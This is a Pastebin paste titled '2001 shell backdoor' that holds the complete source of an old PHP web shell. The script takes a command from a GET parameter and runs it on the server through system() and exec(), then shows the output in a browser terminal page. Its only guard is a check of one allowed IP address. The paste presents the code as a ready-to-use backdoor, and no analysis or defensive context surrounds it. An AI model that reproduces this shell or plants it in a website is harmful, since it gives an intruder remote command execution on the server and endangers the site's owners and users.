API tools faq
paste
Advertisement
Ribang

2001 shell backdoor

Ribang
Jun 29th, 2018
382
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.14 KB | None | 0 0
raw download clone embed print report
  1.  
  2.  
  3.  
  4. <?php
  5. /****************************************************************************\
  6. |* *|
  7. |* shell.php - simple php shell *|
  8. |* *|
  9. |****************************************************************************|
  10. |* *|
  11. |* This is the script issues raw commands on the php enabled server, *|
  12. |* it is very dangerous and should be hidden and password protected. *|
  13. |* NOTE: This script is self contained and hates safe mode in php. *|
  14. |* *|
  15. |* Author: Fanis Dokianakis <madf#hellug.gr>, Last Modified: 11/11/01 *|
  16. |* *|
  17. |* Copyright (C) 2001 by Fanis Dokianakis *|
  18. |* *|
  19. \****************************************************************************/
  20.  
  21.  
  22. $DEBUG=0;
  23. $init_dir="/var/www";
  24. $allow_from="192.168.0.1";
  25.  
  26. if ( $REMOTE_ADDR !== $allow_from ) die ("Nope you can't connect");
  27.  
  28. if ($DEBUG) echo $command,$dir;
  29.  
  30. if ( !isset($command) ) $command="";
  31.  
  32. if ( isset($dir) or !($dir == "") ) {
  33. $work_dir=trim(exec("cd $dir ; pwd"));
  34. } else {
  35. $work_dir=trim(exec("cd $init_dir ; pwd"));
  36. }
  37.  
  38. if ( ereg("^cd", $command) ){
  39. $change_dir=ereg_replace(";.$","",ereg_replace("^cd ","",$command));
  40. $work_dir = trim(exec("cd $dir ; cd $change_dir ; pwd"));
  41. }
  42.  
  43. if ( ereg("^cd", $command) ) $command=ereg_replace("^.;","",$command);
  44. if ($command == "") $command = "wait";
  45.  
  46. ?>
  47. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
  48. <html>
  49. <head>
  50. <title>shell in php</title>
  51. </head>
  52.  
  53. <body bgcolor="#3F4682" text="white">
  54. <center>
  55. <table bgcolor="#2F8894" width="98%" cellspacing=2 cellpadding=1>
  56. <tr><td>
  57. <table width="100%" border=0 cellspacing=0 cellpadding=0>
  58. <tr>
  59. <td bgcolor="black">
  60. <form name="myform" action="<?php echo $PHP_SELF ?>" method="GET">
  61. <textarea color="black" readonly cols="65" rows="24"
  62. style="font-weight: bold; color: white; background-color: black;
  63. font-size: medium; border: 0 solid rgb(0,0,0); vertical-alignment: sub;">
  64. <?php system("cd $work_dir;$command");?>
  65. </textarea>
  66. <table border=0 cellspacing=0 cellpadding=0>
  67. <tr>
  68. <td><b><font color="lightgreen"><?php echo $HTTP_HOST;?></font>:<font
  69. color="red">[</font><font color="blue">php</font><font color="red">]</font> <font color="#90468C"><?php echo trim($work_dir) ?> </font><font color="yellow">$ </font></b></td>
  70. <td>
  71. <input type="text" name="command" value="" size="40" maxlength="255"
  72. style="background-color: #000000; color: #FFFFFF ; border: 0 solid rgb(0,0,0);
  73. font-weight: bold; font-size: medium;;">
  74. </td></tr>
  75. </table>
  76. <input type="hidden" name="dir" value="<?php echo $work_dir ?>">
  77. </form>
  78. </td></tr>
  79. </table>
  80. </td></tr>
  81. </table>
  82. </center>
  83. <?php if ($DEBUG) echo $command,"\n",$work_dir ?>
  84. </body>
  85. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!